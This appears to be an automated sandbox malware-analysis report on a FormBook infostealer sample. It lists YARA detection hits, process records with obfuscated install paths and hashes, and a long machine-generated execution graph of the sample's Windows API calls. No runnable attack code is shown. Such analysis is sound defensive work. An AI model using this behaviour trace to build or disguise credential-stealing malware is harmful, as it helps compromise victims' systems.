                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.23186224923.0000000002F40000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.23186224923.0000000002F40000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                            Reputation:low
                                                            Has exited:false

                                                            General

                                                            Target ID:5
                                                            Start time:11:34:44
                                                            Start date:03/07/2024
                                                            Path:C:\Program Files (x86)\QDDYBUsOSIrUnKhQnRdQSkpzAmPBgXmqwzgPDIagYOtvjhNrDkkLmcM\jFlHFdZgIYNZqR.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Program Files (x86)\QDDYBUsOSIrUnKhQnRdQSkpzAmPBgXmqwzgPDIagYOtvjhNrDkkLmcM\jFlHFdZgIYNZqR.exe"
                                                            Imagebase:0x510000
                                                            File size:140'800 bytes
                                                            MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:false

                                                            General

                                                            Target ID:6
                                                            Start time:11:35:06
                                                            Start date:03/07/2024
                                                            Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                            Imagebase:0x7ff710750000
                                                            File size:597'432 bytes
                                                            MD5 hash:FA9F4FC5D7ECAB5A20BF7A9D1251C851
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Reputation:moderate
                                                            Has exited:true

                                                            Disassembly

                                                            Reset < >

                                                              Execution Graph

                                                              Execution Coverage:4%
                                                              Dynamic/Decrypted Code Coverage:0.4%
                                                              Signature Coverage:3%
                                                              Total number of Nodes:2000
                                                              Total number of Limit Nodes:183
                                                              execution_graph 97688 427e93 97689 427e9f 97688->97689 97725 42a048 GetStartupInfoW 97689->97725 97691 427ea4 97727 428dbc GetProcessHeap 97691->97727 97693 427efc 97694 427f07 97693->97694 97810 427fe3 58 API calls 97693->97810 97728 429d26 97694->97728 97697 427f0d 97698 427f18 97697->97698 97811 427fe3 58 API calls 97697->97811 97749 42d812 97698->97749 97701 427f27 97702 427f33 GetCommandLineW 97701->97702 97812 427fe3 58 API calls 97701->97812 97768 435173 GetEnvironmentStringsW 97702->97768 97706 427f32 97706->97702 97708 427f4d 97709 427f58 97708->97709 97813 4232f5 58 API calls 97708->97813 97778 434fa8 97709->97778 97712 427f5e 97713 427f69 97712->97713 97814 4232f5 58 API calls 97712->97814 97792 42332f 97713->97792 97716 427f71 97717 427f7c 97716->97717 97815 4232f5 58 API calls 97716->97815 97798 40492e 97717->97798 97720 427f90 97721 427f9f 97720->97721 97816 423598 58 API calls 97720->97816 97817 423320 58 API calls 97721->97817 97724 427fa4 97726 42a05e 97725->97726 97726->97691 97727->97693 97818 4233c7 36 API calls 97728->97818 97730 429d2b 97819 429f7c InitializeCriticalSectionAndSpinCount 97730->97819 97732 429d30 97733 429d34 97732->97733 97821 429fca TlsAlloc 97732->97821 97820 429d9c 61 API calls 97733->97820 97736 429d39 97736->97697 97737 429d46 97737->97733 97738 429d51 97737->97738 97822 428a15 97738->97822 97741 429d93 97830 429d9c 61 API calls 97741->97830 97744 429d98 97744->97697 97745 429d72 97745->97741 97746 429d78 97745->97746 97829 429c73 58 API calls 97746->97829 97748 429d80 GetCurrentThreadId 97748->97697 97750 42d81e 97749->97750 97842 429e4b 97750->97842 97752 42d825 97753 428a15 58 API calls 97752->97753 97754 42d836 97753->97754 97755 42d8a1 GetStartupInfoW 97754->97755 97758 42d841 97754->97758 97756 42d8b6 97755->97756 97757 42d9e5 97755->97757 97756->97757 97761 428a15 58 API calls 97756->97761 97764 42d904 97756->97764 97759 42daad 97757->97759 97762 42da32 GetStdHandle 97757->97762 97763 42da45 GetFileType 97757->97763 97850 42a06b InitializeCriticalSectionAndSpinCount 97757->97850 97758->97701 97851 42dabd LeaveCriticalSection 97759->97851 97761->97756 97762->97757 97763->97757 97764->97757 97765 42d938 GetFileType 97764->97765 97849 42a06b InitializeCriticalSectionAndSpinCount 97764->97849 97765->97764 97769 435184 97768->97769 97770 427f43 97768->97770 97891 428a5d 58 API calls 97769->97891 97774 434d6b GetModuleFileNameW 97770->97774 97772 4351aa 97773 4351c0 FreeEnvironmentStringsW 97772->97773 97773->97770 97775 434d9f 97774->97775 97777 434ddf 97775->97777 97892 428a5d 58 API calls 97775->97892 97777->97708 97779 434fb9 97778->97779 97780 434fc1 97778->97780 97779->97712 97781 428a15 58 API calls 97780->97781 97788 434fea 97781->97788 97782 435041 97783 422f95 58 API calls 97782->97783 97783->97779 97784 428a15 58 API calls 97784->97788 97785 435066 97786 422f95 58 API calls 97785->97786 97786->97779 97788->97779 97788->97782 97788->97784 97788->97785 97789 43507d 97788->97789 97893 434857 58 API calls 97788->97893 97894 429006 IsProcessorFeaturePresent 97789->97894 97791 435089 97791->97712 97793 42333b 97792->97793 97917 42a711 97793->97917 97795 423359 97797 423378 97795->97797 97920 422f80 97795->97920 97797->97716 97799 404948 97798->97799 97809 4049e7 97798->97809 97800 404982 IsThemeActive 97799->97800 97955 4235ac 97800->97955 97804 4049ae 97967 404a5b SystemParametersInfoW SystemParametersInfoW 97804->97967 97806 4049ba 97968 403b4c 97806->97968 97808 4049c2 SystemParametersInfoW 97808->97809 97809->97720 97810->97694 97811->97698 97812->97706 97816->97721 97817->97724 97818->97730 97819->97732 97820->97736 97821->97737 97824 428a1c 97822->97824 97825 428a57 97824->97825 97827 428a3a 97824->97827 97831 435446 97824->97831 97825->97741 97828 42a026 TlsSetValue 97825->97828 97827->97824 97827->97825 97839 42a372 Sleep 97827->97839 97828->97745 97829->97748 97830->97744 97832 435451 97831->97832 97834 43546c 97831->97834 97833 43545d 97832->97833 97832->97834 97840 428d68 58 API calls 97833->97840 97836 43547c HeapAlloc 97834->97836 97837 435462 97834->97837 97841 4235e1 DecodePointer 97834->97841 97836->97834 97836->97837 97837->97824 97839->97827 97840->97837 97841->97834 97843 429e6f EnterCriticalSection 97842->97843 97844 429e5c 97842->97844 97843->97752 97852 429ed3 97844->97852 97846 429e62 97846->97843 97876 4232f5 58 API calls 97846->97876 97849->97764 97850->97757 97851->97758 97853 429edf 97852->97853 97854 429f00 97853->97854 97855 429ee8 97853->97855 97864 429f21 97854->97864 97880 428a5d 58 API calls 97854->97880 97877 42a3ab 58 API calls 97855->97877 97858 429eed 97878 42a408 58 API calls 97858->97878 97860 429f15 97862 429f2b 97860->97862 97863 429f1c 97860->97863 97861 429ef4 97879 4232df GetModuleHandleExW GetProcAddress ExitProcess 97861->97879 97867 429e4b 58 API calls 97862->97867 97881 428d68 58 API calls 97863->97881 97864->97846 97869 429f32 97867->97869 97870 429f57 97869->97870 97871 429f3f 97869->97871 97883 422f95 97870->97883 97882 42a06b InitializeCriticalSectionAndSpinCount 97871->97882 97874 429f4b 97889 429f73 LeaveCriticalSection 97874->97889 97877->97858 97878->97861 97880->97860 97881->97864 97882->97874 97884 422fc7 97883->97884 97885 422f9e RtlFreeHeap 97883->97885 97884->97874 97885->97884 97886 422fb3 97885->97886 97890 428d68 58 API calls 97886->97890 97888 422fb9 GetLastError 97888->97884 97889->97864 97890->97888 97891->97772 97892->97777 97893->97788 97895 429011 97894->97895 97900 428e99 97895->97900 97899 42902c 97899->97791 97901 428eb3 97900->97901 97902 428ed3 IsDebuggerPresent 97901->97902 97908 42a395 SetUnhandledExceptionFilter UnhandledExceptionFilter 97902->97908 97905 428fba 97907 42a380 GetCurrentProcess TerminateProcess 97905->97907 97906 428f97 97909 42c836 97906->97909 97907->97899 97908->97906 97910 42c840 IsProcessorFeaturePresent 97909->97910 97911 42c83e 97909->97911 97913 435b5a 97910->97913 97911->97905 97916 435b09 GetCurrentProcess TerminateProcess SetUnhandledExceptionFilter UnhandledExceptionFilter IsDebuggerPresent 97913->97916 97915 435c3d 97915->97905 97916->97915 97918 42a714 EncodePointer 97917->97918 97918->97918 97919 42a72e 97918->97919 97919->97795 97923 422e84 97920->97923 97922 422f8b 97922->97797 97924 422e90 97923->97924 97931 423457 97924->97931 97930 422eb7 97930->97922 97932 429e4b 58 API calls 97931->97932 97933 422e99 97932->97933 97934 422ec8 DecodePointer DecodePointer 97933->97934 97935 422ea5 97934->97935 97936 422ef5 97934->97936 97945 422ec2 97935->97945 97936->97935 97948 4289e4 59 API calls 97936->97948 97938 422f07 97939 422f58 EncodePointer EncodePointer 97938->97939 97941 422f2c 97938->97941 97949 428aa4 61 API calls 97938->97949 97939->97935 97941->97935 97943 422f46 EncodePointer 97941->97943 97950 428aa4 61 API calls 97941->97950 97943->97939 97944 422f40 97944->97935 97944->97943 97951 423460 97945->97951 97948->97938 97949->97941 97950->97944 97954 429fb5 LeaveCriticalSection 97951->97954 97953 422ec7 97953->97930 97954->97953 97956 429e4b 58 API calls 97955->97956 97957 4235b7 DecodePointer EncodePointer 97956->97957 98020 429fb5 LeaveCriticalSection 97957->98020 97959 4049a7 97960 423614 97959->97960 97961 423638 97960->97961 97962 42361e 97960->97962 97961->97804 97962->97961 98021 428d68 58 API calls 97962->98021 97964 423628 98022 428ff6 9 API calls 97964->98022 97966 423633 97966->97804 97967->97806 97969 403b59 97968->97969 98023 4077c7 97969->98023 97973 403b8c IsDebuggerPresent 97974 403b9a 97973->97974 97975 43d4ad MessageBoxA 97973->97975 97976 403c73 97974->97976 97978 43d4c7 97974->97978 97979 403bb7 97974->97979 97975->97978 97977 403c7a SetCurrentDirectoryW 97976->97977 97982 403c87 97977->97982 98247 407373 59 API calls 97978->98247 98109 4073e5 97979->98109 97982->97808 97983 43d4d7 97988 43d4ed SetCurrentDirectoryW 97983->97988 97985 403bd5 GetFullPathNameW 98125 407d2c 97985->98125 97987 403c10 98134 410a8d 97987->98134 97988->97982 97991 403c2e 97992 403c38 97991->97992 98248 464c03 AllocateAndInitializeSid CheckTokenMembership FreeSid 97991->98248 98150 403a58 GetSysColorBrush LoadCursorW LoadIconW LoadIconW LoadIconW 97992->98150 97995 43d50a 97995->97992 97999 43d51b 97995->97999 97998 403c42 98000 403c55 97998->98000 98158 4043db 97998->98158 98249 404864 97999->98249 98169 410b30 98000->98169 98002 43d523 98256 407f41 98002->98256 98020->97959 98021->97964 98022->97966 98276 420ff6 98023->98276 98025 4077e8 98026 420ff6 59 API calls 98025->98026 98027 403b63 GetCurrentDirectoryW 98026->98027 98028 403778 98027->98028 98029 4077c7 59 API calls 98028->98029 98030 40378e 98029->98030 98314 403d43 98030->98314 98032 4037ac 98033 404864 61 API calls 98032->98033 98034 4037c0 98033->98034 98035 407f41 59 API calls 98034->98035 98036 4037cd 98035->98036 98328 404f3d 98036->98328 98039 43d3ae 98399 4697e5 98039->98399 98040 4037ee 98352 4081a7 98040->98352 98043 43d3cd 98046 422f95 58 API calls 98043->98046 98048 43d3da 98046->98048 98050 404faa 84 API calls 98048->98050 98052 43d3e3 98050->98052 98056 403ee2 59 API calls 98052->98056 98053 407f41 59 API calls 98054 40381a 98053->98054 98359 408620 98054->98359 98058 43d3fe 98056->98058 98057 40382c 98059 407f41 59 API calls 98057->98059 98060 403ee2 59 API calls 98058->98060 98061 403852 98059->98061 98062 43d41a 98060->98062 98063 408620 69 API calls 98061->98063 98064 404864 61 API calls 98062->98064 98066 403861 98063->98066 98065 43d43f 98064->98065 98067 403ee2 59 API calls 98065->98067 98069 4077c7 59 API calls 98066->98069 98068 43d44b 98067->98068 98070 4081a7 59 API calls 98068->98070 98071 40387f 98069->98071 98072 43d459 98070->98072 98363 403ee2 98071->98363 98074 403ee2 59 API calls 98072->98074 98076 43d468 98074->98076 98082 4081a7 59 API calls 98076->98082 98078 403899 98078->98052 98079 4038a3 98078->98079 98080 42313d 60 API calls 98079->98080 98081 4038ae 98080->98081 98081->98058 98083 4038b8 98081->98083 98084 43d48a 98082->98084 98085 42313d 60 API calls 98083->98085 98086 403ee2 59 API calls 98084->98086 98087 4038c3 98085->98087 98088 43d497 98086->98088 98087->98062 98089 4038cd 98087->98089 98088->98088 98090 42313d 60 API calls 98089->98090 98091 4038d8 98090->98091 98091->98076 98092 403919 98091->98092 98094 403ee2 59 API calls 98091->98094 98092->98076 98093 403926 98092->98093 98379 40942e 98093->98379 98096 4038fc 98094->98096 98098 4081a7 59 API calls 98096->98098 98100 40390a 98098->98100 98102 403ee2 59 API calls 98100->98102 98102->98092 98104 4093ea 59 API calls 98106 403961 98104->98106 98105 409040 60 API calls 98105->98106 98106->98104 98106->98105 98107 403ee2 59 API calls 98106->98107 98108 4039a7 98106->98108 98107->98106 98108->97973 98110 4073f2 98109->98110 98111 43ee4b 98110->98111 98112 40740b 98110->98112 98114 43ee67 GetOpenFileNameW 98111->98114 99194 4048ae 98112->99194 98116 43eeb6 98114->98116 98118 407d2c 59 API calls 98116->98118 98120 43eecb 98118->98120 98120->98120 98122 407429 99222 4069ca 98122->99222 98126 407da5 98125->98126 98127 407d38 98125->98127 98128 407e8c 59 API calls 98126->98128 98129 407d73 98127->98129 98130 407d4e 98127->98130 98133 407d56 98128->98133 98131 408189 59 API calls 98129->98131 99552 408087 59 API calls 98130->99552 98131->98133 98133->97987 98135 410a9a 98134->98135 99553 406ee0 98135->99553 98137 410a9f 98149 403c26 98137->98149 99564 4112fe 89 API calls 98137->99564 98139 410aac 98139->98149 99565 414047 91 API calls 98139->99565 98141 410ab5 98142 410ab9 GetFullPathNameW 98141->98142 98141->98149 98143 407d2c 59 API calls 98142->98143 98144 410ae5 98143->98144 98145 407d2c 59 API calls 98144->98145 98146 410af2 98145->98146 98147 4450d5 98146->98147 98148 407d2c 59 API calls 98146->98148 98148->98149 98149->97983 98149->97991 98151 403ac2 LoadImageW RegisterClassExW 98150->98151 98152 43d49c 98150->98152 99604 403041 7 API calls 98151->99604 99605 4048fe LoadImageW EnumResourceNamesW 98152->99605 98155 403b46 98157 4039e7 CreateWindowExW CreateWindowExW ShowWindow ShowWindow 98155->98157 98156 43d4a5 98157->97998 98159 404406 98158->98159 99606 404213 98159->99606 98167 40448b 98170 4450ed 98169->98170 98184 410b55 98169->98184 99695 46a0b5 89 API calls 98170->99695 98177 410bab PeekMessageW 98245 410b65 98177->98245 98181 4452ab Sleep 98181->98245 98183 410e44 98184->98245 99696 409fbd 60 API calls 98184->99696 99697 4568bf 341 API calls 98184->99697 98188 410fa3 PeekMessageW 98188->98245 98189 410fbf TranslateMessage DispatchMessageW 98189->98188 98190 44517a TranslateAcceleratorW 98190->98188 98190->98245 98191 420ff6 59 API calls 98191->98245 98192 410e73 timeGetTime 98192->98245 98193 445c49 WaitForSingleObject 98193->98245 98196 410fdd Sleep 98229 410fee 98196->98229 98197 4081a7 59 API calls 98197->98245 98199 445f22 Sleep 98199->98229 98201 40b89c 314 API calls 98201->98245 98204 4110ae timeGetTime 98222 409fbd 60 API calls 98222->98245 98225 40a000 314 API calls 98225->98245 98230 4110f5 98229->98230 98229->98245 98232 46a0b5 89 API calls 98232->98245 98234 409df0 59 API calls 98234->98245 98235 408620 69 API calls 98235->98245 98237 4566f4 59 API calls 98237->98245 98238 4459ff VariantClear 98238->98245 98239 445a95 VariantClear 98239->98245 98240 408e34 59 API calls 98240->98245 98241 445843 VariantClear 98241->98245 98242 457405 59 API calls 98242->98245 98243 407f41 59 API calls 98243->98245 98244 408b13 69 API calls 98244->98245 98245->98177 98245->98181 98245->98183 98245->98188 98245->98189 98245->98190 98245->98191 98245->98192 98245->98193 98245->98196 98245->98197 98245->98199 98245->98201 98245->98204 98245->98222 98245->98225 98245->98229 98245->98230 98245->98232 98245->98234 98245->98235 98245->98237 98245->98238 98245->98239 98245->98240 98245->98241 98245->98242 98245->98243 98245->98244 99633 40e580 98245->99633 99640 40e800 98245->99640 99671 40f5c0 98245->99671 99690 40fe40 341 API calls 98245->99690 99691 4031ce IsDialogMessageW GetClassLongW 98245->99691 99698 48629f 59 API calls 98245->99698 99699 469c9f 59 API calls 98245->99699 99700 45d9e3 59 API calls 98245->99700 99701 409997 98245->99701 99719 456665 59 API calls 98245->99719 99720 408561 59 API calls 98245->99720 99721 40843f 59 API calls 98245->99721 98247->97983 98248->97995 98250 431b90 98249->98250 98251 404871 GetModuleFileNameW 98250->98251 98252 407f41 59 API calls 98251->98252 98253 404897 98252->98253 98254 4048ae 60 API calls 98253->98254 98255 4048a1 98254->98255 98255->98002 98279 420ffe 98276->98279 98278 421018 98278->98025 98279->98278 98281 42101c 98279->98281 98286 42594c 98279->98286 98303 4235e1 DecodePointer 98279->98303 98304 4287db RaiseException 98281->98304 98283 421046 98305 428711 58 API calls 98283->98305 98285 421058 98285->98025 98287 4259c7 98286->98287 98297 425958 98286->98297 98312 4235e1 DecodePointer 98287->98312 98289 4259cd 98313 428d68 58 API calls 98289->98313 98292 42598b RtlAllocateHeap 98293 4259bf 98292->98293 98292->98297 98293->98279 98295 425963 98295->98297 98306 42a3ab 58 API calls 98295->98306 98307 42a408 58 API calls 98295->98307 98308 4232df GetModuleHandleExW GetProcAddress ExitProcess 98295->98308 98296 4259b3 98310 428d68 58 API calls 98296->98310 98297->98292 98297->98295 98297->98296 98301 4259b1 98297->98301 98309 4235e1 DecodePointer 98297->98309 98311 428d68 58 API calls 98301->98311 98303->98279 98304->98283 98305->98285 98306->98295 98307->98295 98309->98297 98310->98301 98311->98293 98312->98289 98313->98293 98315 403d50 98314->98315 98316 407d2c 59 API calls 98315->98316 98320 403eb6 98315->98320 98318 403d82 98316->98318 98326 403db8 98318->98326 98440 407b52 98318->98440 98319 403e89 98319->98320 98321 407f41 59 API calls 98319->98321 98320->98032 98323 403eaa 98321->98323 98322 407f41 59 API calls 98322->98326 98325 403f84 59 API calls 98323->98325 98324 407b52 59 API calls 98324->98326 98325->98320 98326->98319 98326->98320 98326->98322 98326->98324 98443 403f84 98326->98443 98453 404d13 98328->98453 98333 404f68 LoadLibraryExW 98463 404cc8 98333->98463 98334 43dd0f 98335 404faa 84 API calls 98334->98335 98337 43dd16 98335->98337 98340 404cc8 3 API calls 98337->98340 98342 43dd1e 98340->98342 98341 404f8f 98341->98342 98343 404f9b 98341->98343 98489 40506b 98342->98489 98344 404faa 84 API calls 98343->98344 98346 4037e6 98344->98346 98346->98039 98346->98040 98349 43dd45 98497 405027 98349->98497 98351 43dd52 98353 4081b2 98352->98353 98354 403801 98352->98354 98927 4080d7 59 API calls 98353->98927 98356 4093ea 98354->98356 98357 420ff6 59 API calls 98356->98357 98358 40380d 98357->98358 98358->98053 98360 40862b 98359->98360 98362 408652 98360->98362 98928 408b13 69 API calls 98360->98928 98362->98057 98364 403f05 98363->98364 98365 403eec 98363->98365 98366 407d2c 59 API calls 98364->98366 98367 4081a7 59 API calls 98365->98367 98368 40388b 98366->98368 98367->98368 98369 42313d 98368->98369 98370 4231be 98369->98370 98371 423149 98369->98371 98931 4231d0 60 API calls 98370->98931 98378 42316e 98371->98378 98929 428d68 58 API calls 98371->98929 98374 4231cb 98374->98078 98375 423155 98930 428ff6 9 API calls 98375->98930 98377 423160 98377->98078 98378->98078 98380 409436 98379->98380 98381 420ff6 59 API calls 98380->98381 98382 409444 98381->98382 98383 403936 98382->98383 98932 40935c 59 API calls 98382->98932 98385 4091b0 98383->98385 98933 4092c0 98385->98933 98387 4091bf 98388 420ff6 59 API calls 98387->98388 98389 403944 98387->98389 98388->98389 98390 409040 98389->98390 98391 43f5a5 98390->98391 98396 409057 98390->98396 98391->98396 98943 408d3b 59 API calls 98391->98943 98393 4091a0 98942 409e9c 60 API calls 98393->98942 98394 409158 98397 420ff6 59 API calls 98394->98397 98396->98393 98396->98394 98398 40915f 98396->98398 98397->98398 98398->98106 98400 405045 85 API calls 98399->98400 98401 469854 98400->98401 98944 4699be 98401->98944 98404 40506b 74 API calls 98405 469881 98404->98405 98406 40506b 74 API calls 98405->98406 98407 469891 98406->98407 98408 40506b 74 API calls 98407->98408 98409 4698ac 98408->98409 98410 40506b 74 API calls 98409->98410 98411 4698c7 98410->98411 98412 405045 85 API calls 98411->98412 98413 4698de 98412->98413 98414 42594c 58 API calls 98413->98414 98415 4698e5 98414->98415 98416 42594c 58 API calls 98415->98416 98417 4698ef 98416->98417 98418 40506b 74 API calls 98417->98418 98419 469903 98418->98419 98420 469393 GetSystemTimeAsFileTime 98419->98420 98421 469916 98420->98421 98422 469940 98421->98422 98423 46992b 98421->98423 98425 469946 98422->98425 98426 4699a5 98422->98426 98424 422f95 58 API calls 98423->98424 98429 469931 98424->98429 98950 468d90 98425->98950 98428 422f95 58 API calls 98426->98428 98431 43d3c1 98428->98431 98432 422f95 58 API calls 98429->98432 98431->98043 98434 404faa 98431->98434 98432->98431 98433 422f95 58 API calls 98433->98431 98435 404fb4 98434->98435 98436 404fbb 98434->98436 98437 4255d6 83 API calls 98435->98437 98438 404fca 98436->98438 98439 404fdb FreeLibrary 98436->98439 98437->98436 98438->98043 98439->98438 98449 407faf 98440->98449 98442 407b5d 98442->98318 98444 403f92 98443->98444 98448 403fb4 98443->98448 98446 420ff6 59 API calls 98444->98446 98445 420ff6 59 API calls 98447 403fc8 98445->98447 98446->98448 98447->98326 98448->98445 98450 407fc2 98449->98450 98452 407fbf 98449->98452 98451 420ff6 59 API calls 98450->98451 98451->98452 98452->98442 98502 404d61 98453->98502 98456 404d53 98460 42548b 98456->98460 98457 404d4a FreeLibrary 98457->98456 98458 404d61 2 API calls 98459 404d3a 98458->98459 98459->98456 98459->98457 98506 4254a0 98460->98506 98462 404f5c 98462->98333 98462->98334 98664 404d94 98463->98664 98466 404ced 98468 404d08 98466->98468 98469 404cff FreeLibrary 98466->98469 98467 404d94 2 API calls 98467->98466 98470 404dd0 98468->98470 98469->98468 98471 420ff6 59 API calls 98470->98471 98472 404de5 98471->98472 98668 40538e 98472->98668 98474 404df1 98475 404e2c 98474->98475 98476 404f21 98474->98476 98477 404ee9 98474->98477 98478 405027 69 API calls 98475->98478 98682 469ba5 95 API calls 98476->98682 98671 404fe9 CreateStreamOnHGlobal 98477->98671 98484 404e35 98478->98484 98481 40506b 74 API calls 98481->98484 98482 404ec9 98482->98341 98484->98481 98484->98482 98485 43dcd0 98484->98485 98677 405045 98484->98677 98486 405045 85 API calls 98485->98486 98487 43dce4 98486->98487 98488 40506b 74 API calls 98487->98488 98488->98482 98490 40507d 98489->98490 98493 43ddf6 98489->98493 98706 425812 98490->98706 98494 469393 98904 4691e9 98494->98904 98496 4693a9 98496->98349 98498 405036 98497->98498 98499 43ddb9 98497->98499 98909 425e90 98498->98909 98501 40503e 98501->98351 98503 404d2e 98502->98503 98504 404d6a LoadLibraryA 98502->98504 98503->98458 98503->98459 98504->98503 98505 404d7b GetProcAddress 98504->98505 98505->98503 98509 4254ac 98506->98509 98507 4254bf 98555 428d68 58 API calls 98507->98555 98509->98507 98511 4254f0 98509->98511 98510 4254c4 98556 428ff6 9 API calls 98510->98556 98525 430738 98511->98525 98514 4254f5 98515 42550b 98514->98515 98516 4254fe 98514->98516 98518 425535 98515->98518 98519 425515 98515->98519 98557 428d68 58 API calls 98516->98557 98540 430857 98518->98540 98558 428d68 58 API calls 98519->98558 98520 4254cf 98520->98462 98526 430744 98525->98526 98527 429e4b 58 API calls 98526->98527 98538 430752 98527->98538 98528 4307c6 98560 43084e 98528->98560 98529 4307cd 98565 428a5d 58 API calls 98529->98565 98532 4307d4 98532->98528 98566 42a06b InitializeCriticalSectionAndSpinCount 98532->98566 98533 430843 98533->98514 98535 429ed3 58 API calls 98535->98538 98537 4307fa EnterCriticalSection 98537->98528 98538->98528 98538->98529 98538->98535 98563 426e8d 59 API calls 98538->98563 98564 426ef7 LeaveCriticalSection LeaveCriticalSection 98538->98564 98541 430877 98540->98541 98542 430891 98541->98542 98551 430a4c 98541->98551 98573 423a0b 60 API calls 98541->98573 98571 428d68 58 API calls 98542->98571 98544 430896 98572 428ff6 9 API calls 98544->98572 98546 425540 98559 425562 LeaveCriticalSection LeaveCriticalSection 98546->98559 98547 430aaf 98568 4387f1 98547->98568 98550 430a45 98550->98551 98574 423a0b 60 API calls 98550->98574 98551->98542 98551->98547 98553 430a64 98553->98551 98575 423a0b 60 API calls 98553->98575 98555->98510 98556->98520 98557->98520 98558->98520 98559->98520 98567 429fb5 LeaveCriticalSection 98560->98567 98562 430855 98562->98533 98563->98538 98564->98538 98565->98532 98566->98537 98567->98562 98576 437fd5 98568->98576 98570 43880a 98570->98546 98571->98544 98572->98546 98573->98550 98574->98553 98575->98551 98577 437fe1 98576->98577 98578 437ff7 98577->98578 98581 43802d 98577->98581 98661 428d68 58 API calls 98578->98661 98580 437ffc 98662 428ff6 9 API calls 98580->98662 98587 43809e 98581->98587 98584 438049 98663 438072 LeaveCriticalSection 98584->98663 98586 438006 98586->98570 98588 4380be 98587->98588 98589 42471a 58 API calls 98588->98589 98592 4380da 98589->98592 98590 429006 8 API calls 98591 4387f0 98590->98591 98593 437fd5 103 API calls 98591->98593 98594 438114 98592->98594 98598 438137 98592->98598 98610 438211 98592->98610 98596 43880a 98593->98596 98595 428d34 58 API calls 98594->98595 98597 438119 98595->98597 98596->98584 98599 428d68 58 API calls 98597->98599 98601 4381f5 98598->98601 98609 4381d3 98598->98609 98600 438126 98599->98600 98602 428ff6 9 API calls 98600->98602 98603 428d34 58 API calls 98601->98603 98604 438130 98602->98604 98605 4381fa 98603->98605 98604->98584 98606 428d68 58 API calls 98605->98606 98607 438207 98606->98607 98608 428ff6 9 API calls 98607->98608 98608->98610 98611 42d4d4 61 API calls 98609->98611 98610->98590 98612 4382a1 98611->98612 98613 4382ab 98612->98613 98614 4382ce 98612->98614 98616 428d34 58 API calls 98613->98616 98615 437f4d GetModuleHandleW GetProcAddress CreateFileW 98614->98615 98626 4382f0 98615->98626 98617 4382b0 98616->98617 98618 428d68 58 API calls 98617->98618 98620 4382ba 98618->98620 98619 43836e GetFileType 98621 4383bb 98619->98621 98622 438379 GetLastError 98619->98622 98624 428d68 58 API calls 98620->98624 98631 42d76a 59 API calls 98621->98631 98625 428d47 58 API calls 98622->98625 98623 43833c GetLastError 98627 428d47 58 API calls 98623->98627 98624->98604 98629 4383a0 CloseHandle 98625->98629 98626->98619 98626->98623 98630 437f4d GetModuleHandleW GetProcAddress CreateFileW 98626->98630 98628 438361 98627->98628 98634 428d68 58 API calls 98628->98634 98629->98628 98632 4383ae 98629->98632 98633 438331 98630->98633 98638 4383d9 98631->98638 98635 428d68 58 API calls 98632->98635 98633->98619 98633->98623 98634->98610 98636 4383b3 98635->98636 98636->98628 98637 438594 98637->98610 98640 438767 CloseHandle 98637->98640 98638->98637 98639 431b11 60 API calls 98638->98639 98655 43845a 98638->98655 98641 438443 98639->98641 98642 437f4d GetModuleHandleW GetProcAddress CreateFileW 98640->98642 98644 428d34 58 API calls 98641->98644 98641->98655 98643 43878e 98642->98643 98646 438796 GetLastError 98643->98646 98647 4387c2 98643->98647 98644->98655 98645 4310ab 70 API calls 98645->98655 98648 428d47 58 API calls 98646->98648 98647->98610 98650 4387a2 98648->98650 98649 43848c 98652 4399f2 82 API calls 98649->98652 98649->98655 98653 42d67d 59 API calls 98650->98653 98651 430d2d 61 API calls 98651->98655 98652->98649 98653->98647 98654 42dac6 78 API calls 98654->98655 98655->98637 98655->98645 98655->98649 98655->98651 98655->98654 98656 438611 98655->98656 98657 431b11 60 API calls 98655->98657 98658 430d2d 61 API calls 98656->98658 98657->98655 98659 438618 98658->98659 98660 428d68 58 API calls 98659->98660 98660->98610 98661->98580 98662->98586 98663->98586 98665 404ce1 98664->98665 98666 404d9d LoadLibraryA 98664->98666 98665->98466 98665->98467 98666->98665 98667 404dae GetProcAddress 98666->98667 98667->98665 98669 420ff6 59 API calls 98668->98669 98670 4053a0 98669->98670 98670->98474 98672 405003 FindResourceExW 98671->98672 98676 405020 98671->98676 98673 43dd5c LoadResource 98672->98673 98672->98676 98674 43dd71 SizeofResource 98673->98674 98673->98676 98675 43dd85 LockResource 98674->98675 98674->98676 98675->98676 98676->98475 98678 405054 98677->98678 98679 43ddd4 98677->98679 98683 425a7d 98678->98683 98681 405062 98681->98484 98682->98475 98684 425a89 98683->98684 98685 425a9b 98684->98685 98687 425ac1 98684->98687 98696 428d68 58 API calls 98685->98696 98698 426e4e 98687->98698 98689 425aa0 98697 428ff6 9 API calls 98689->98697 98690 425ac7 98704 4259ee 83 API calls 98690->98704 98693 425ad6 98705 425af8 LeaveCriticalSection LeaveCriticalSection 98693->98705 98694 425aab 98694->98681 98696->98689 98697->98694 98699 426e80 EnterCriticalSection 98698->98699 98700 426e5e 98698->98700 98701 426e76 98699->98701 98700->98699 98702 426e66 98700->98702 98701->98690 98703 429e4b 58 API calls 98702->98703 98703->98701 98704->98693 98705->98694 98709 42582d 98706->98709 98708 40508e 98708->98494 98710 425839 98709->98710 98711 42587c 98710->98711 98712 425874 98710->98712 98716 42584f 98710->98716 98713 426e4e 59 API calls 98711->98713 98712->98708 98715 425882 98713->98715 98722 42564d 98715->98722 98736 428d68 58 API calls 98716->98736 98717 425869 98737 428ff6 9 API calls 98717->98737 98724 425668 98722->98724 98728 425683 98722->98728 98723 425673 98834 428d68 58 API calls 98723->98834 98724->98723 98724->98728 98731 4256c3 98724->98731 98726 425678 98835 428ff6 9 API calls 98726->98835 98738 4258b6 LeaveCriticalSection LeaveCriticalSection 98728->98738 98730 4257d4 98837 428d68 58 API calls 98730->98837 98731->98728 98731->98730 98739 424916 98731->98739 98746 4310ab 98731->98746 98814 430df7 98731->98814 98836 430f18 58 API calls 98731->98836 98736->98717 98737->98712 98738->98712 98740 424920 98739->98740 